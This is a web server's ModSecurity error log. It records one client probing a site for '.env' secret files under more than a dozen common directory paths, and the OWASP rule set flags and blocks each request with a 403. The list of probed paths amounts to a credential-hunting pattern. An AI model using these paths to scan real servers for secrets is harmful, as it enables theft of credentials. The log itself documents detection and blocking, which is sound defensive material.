[Mon May 11 16:41:37.396531 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/releases/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCQAAAAQo"]
[Mon May 11 16:41:37.397026 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/releases/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCQAAAAQo"]
[Mon May 11 16:41:37.397297 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/releases/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCQAAAAQo"]
[Mon May 11 16:41:37.560435 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCQQAAAQo"]
[Mon May 11 16:41:37.560951 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCQQAAAQo"]
[Mon May 11 16:41:37.561196 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCQQAAAQo"]
[Mon May 11 16:41:37.746656 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/deploy/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCQwAAAQo"]
[Mon May 11 16:41:37.747188 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/deploy/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCQwAAAQo"]
[Mon May 11 16:41:37.747422 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/deploy/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCQwAAAQo"]
[Mon May 11 16:41:37.919708 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/build/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCRAAAAQo"]
[Mon May 11 16:41:37.920237 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/build/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCRAAAAQo"]
[Mon May 11 16:41:37.920465 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/build/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCRAAAAQo"]
[Mon May 11 16:41:38.346630 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/dist/.env"] [unique_id "agHqokWKUxpmnkK7zHyCRQAAAQo"]
[Mon May 11 16:41:38.347207 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/dist/.env"] [unique_id "agHqokWKUxpmnkK7zHyCRQAAAQo"]
[Mon May 11 16:41:38.515735 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/dist/.env"] [unique_id "agHqokWKUxpmnkK7zHyCRQAAAQo"]
[Mon May 11 16:41:38.517071 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agHqokWKUxpmnkK7zHyCRgAAAQo"]
[Mon May 11 16:41:38.517620 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agHqokWKUxpmnkK7zHyCRgAAAQo"]
[Mon May 11 16:41:38.517829 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agHqokWKUxpmnkK7zHyCRgAAAQo"]
[Mon May 11 16:41:38.686451 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/htdocs/.env"] [unique_id "agHqokWKUxpmnkK7zHyCRwAAAQo"]
[Mon May 11 16:41:38.687028 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/htdocs/.env"] [unique_id "agHqokWKUxpmnkK7zHyCRwAAAQo"]
[Mon May 11 16:41:38.687294 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/htdocs/.env"] [unique_id "agHqokWKUxpmnkK7zHyCRwAAAQo"]
[Mon May 11 16:41:38.859335 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/www/.env"] [unique_id "agHqokWKUxpmnkK7zHyCSQAAAQo"]
[Mon May 11 16:41:38.859823 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/www/.env"] [unique_id "agHqokWKUxpmnkK7zHyCSQAAAQo"]
[Mon May 11 16:41:38.860053 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/www/.env"] [unique_id "agHqokWKUxpmnkK7zHyCSQAAAQo"]
[Mon May 11 16:41:39.133101 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/html/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCSgAAAQo"]
[Mon May 11 16:41:39.133600 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/html/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCSgAAAQo"]
[Mon May 11 16:41:39.133827 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/html/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCSgAAAQo"]
[Mon May 11 16:41:39.310524 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/live/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCSwAAAQo"]
[Mon May 11 16:41:39.311026 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/live/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCSwAAAQo"]
[Mon May 11 16:41:39.311290 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/live/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCSwAAAQo"]
[Mon May 11 16:41:39.475729 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCTAAAAQo"]
[Mon May 11 16:41:39.476295 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCTAAAAQo"]
[Mon May 11 16:41:39.476645 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCTAAAAQo"]
[Mon May 11 16:41:39.936928 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCTgAAAQo"]
[Mon May 11 16:41:39.937612 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCTgAAAQo"]
[Mon May 11 16:41:39.937907 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agHqo0WKUxpmnkK7zHyCTgAAAQo"]
[Mon May 11 16:41:40.105313 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCTwAAAQo"]
[Mon May 11 16:41:40.105827 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCTwAAAQo"]
[Mon May 11 16:41:40.106062 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCTwAAAQo"]
